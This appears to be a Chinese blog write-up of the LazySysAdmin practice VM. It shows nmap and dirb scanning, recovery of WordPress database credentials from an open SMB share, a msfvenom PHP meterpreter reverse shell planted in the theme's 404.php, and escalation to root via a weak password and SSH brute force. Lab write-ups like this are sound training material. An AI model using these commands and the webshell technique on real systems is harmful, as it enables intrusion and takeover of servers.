lazysysadmin靶机练习

最新推荐文章于 2023-12-12 16:52:49 发布

compact disk

最新推荐文章于 2023-12-12 16:52:49 发布

阅读量167

收藏

点赞数

分类专栏：靶机文章标签：网络安全

版权声明：本文为博主原创文章，遵循 CC 4.0 BY-SA 版权协议，转载请附上原文出处链接和本声明。

本文链接：https://blog.csdn.net/yifujiadeng/article/details/116087161

版权

靶机专栏收录该内容

5 篇文章 0 订阅

订阅专栏

lazysysadmin靶机练习

网络结构：

环境搭建平台为VMware15，网络为nat模式，网段192.168.1.0/24

网络由攻击机kali、靶机组成

靶机ip：192.168.1.138

kali linux ip：192.168.1.137

信息收集：

主机发现：

nmap -sP 192.168.1.0/24

在这里插入图片描述

端口扫描：

nmap -sV 192.168.1.138

可以看到目标主机开放了samba服务，先放着一会再看

在这里插入图片描述

目录爆破：

这里用了kali里已有的dirb进行目录遍历

dirb "http://192.168.1.138" /usr/share/dirb/wordlists/big.txt

可以看到有一个wordpress目录，猜想网站是wordpress架构的，另外有一个phpmyadmin目录，大概可以登录管理数据库

在这里插入图片描述

直接访问80端口，跳转到一个近似静态的页面，几乎没有什么互动性，也不会跳转到其他页面

在这里插入图片描述

查看一下robots.txt

显示出来的目录和我们用dirb爆破出的基本一致

在这里插入图片描述

依次访问我们之前爆破出的目录，看看有什么有用的信息

访问http://192.168.1.138/wordpress/wp-admin/时会跳转到一个后台管理登录页面，不知道账户名密码，先放着

在这里插入图片描述

访问http://192.168.1.138/phpmyadmin/会跳转到phpmyadmin，依旧放在一边

在这里插入图片描述

直接访问wordpress目录会到一个可留言的web页面，内容全部是my name is togie看起来像是个博客之类的，翻到底下还可以看见评论

在这里插入图片描述

漏洞挖掘：

网站上并没有发现什么特别有用的信息，除了看到一个togie，疑似用户名，可以尝试ssh爆破，其他地方没有很明显的漏洞点，我们之前扫描端口的时候发现了靶机开放，连上去看一看

smb://192.168.1.138/

在这里插入图片描述

点进共享文件夹后，可以看到里面的这些目录，和我们爆破到的网站目录基本一致，既然如此，可以看看有没有我们想要找的配置文件，比如说wp-congfig.php之类的

在这里插入图片描述

果然有，打开以后找到我们想要的数据库用户名密码

Admin、TogieMYSQL12345^^

在这里插入图片描述

还可以在一个deets.txt文件里看到一串密码12345，暂时不知道有什么用

在这里插入图片描述

分别登录到之前找到的phpmyadmin页面和wordpress后台管理页面

phpmyadmin很明显是没给权限，这里查不了数据表

在这里插入图片描述

再登录下后台试试，登录成功

在这里插入图片描述

进到后台之后挨个页面查看，可以看到一个页面可以修改部分页面代码，如下图，我们可以看到一个404.php，点进去看一下

在这里插入图片描述

看了这个页面内容后，这是一个显示访问页面不存在的一个跳转页面，我们测试一下猜想，在/wordpress路径下随便提交个不存在的参数

在这里插入图片描述

可以看到，上下两图的回显内容是一样的，是此页面对应的源码没错

在这里插入图片描述

既然这里可以修改源码，那我们可以在这里换上我们的代码，反弹一个shell回来

先用msf制作一个反弹shell的php木马

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.137 lport=4444 -f raw > 1.php

在这里插入图片描述
生成木马如下图，ip地址为kali的ip，端口号4444为kali要监听的端口

在这里插入图片描述

我们把这个代码内容粘贴到之前的那个404.php里

在这里插入图片描述

点击update更新

然后在kali端监听端口

在这里插入图片描述
再次刷新之前那个显示notfound的页面，反弹成功，查看下信息，无误

在这里插入图片描述

提权

这里我用了几个exp提权都出现了问题，按理说这个14.04的ubuntu应该可以正常提权，可能是我的环境出现了些问题，也可能是我操作不当，因此提权用到了之前的那个deets.txt里提到的密码12345，以及/wordpress路径下主页面反复提到的my name is togie(讲实话这个地方一串这个有点吓人)

言归正传，是在参考了网上其他writeup后发现了这个密码12345和togie的联系和用处(文章末尾附参考链接)，首先我们利用已经获取到的shell，在获取一个交互shell，以使用su命令

python -c "import pty;pty.spawn('/bin/bash');"

在这里插入图片描述
当我们转换到togie用户后会惊喜的发现，他可以直接转root用户，至此提权完毕，整个渗透过程也已经完成了

在这里插入图片描述
提权过程出乎意料的短，整个靶机的渗透过程相对其他靶机也显得稍有些简单，但一切简单全都源于后台放了一个含密码的deets.txt文件在网站wordpress根目录下，此处提到推出服务器后，记得删除该文件，并及时更新密码，但管理员并没有这样做，这也就是lazysysadmin的含义了吧，也是我们平时很容易犯的错误。

在这里插入图片描述

其他思路：

其实刚刚进到wordpress路径下的时候看到那个togie用户名就可以尝试ssh爆破一下的，后来我们看到的那个密码12345强度也相当弱，用网上找的到的大多数字典也都可以爆破的出

依旧是用msf，用ssh的爆破模块，这里用户名和密码的字典是分开的，用户名的字典里我自己添加了togie这个用户名

在这里插入图片描述
很快就能爆破的出用户名密码 togie:12345

在这里插入图片描述
ssh连接

在这里插入图片描述
切换root用户

在这里插入图片描述
文章参考：

https://zhuanlan.zhihu.com/p/114916169

compact disk

关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
1
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

专栏目录

评论 1

被折叠的条评论为什么被折叠?

到【灌水乐园】发言

查看更多评论

添加红包

成就一亿技术人!

hope_wisdom

发出的红包

实付元

使用余额支付

点击重新获取

扫码支付

钱包余额 0

抵扣说明：

1.余额是钱包充值的虚拟货币，按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载，可以购买VIP、付费专栏及课程。

余额充值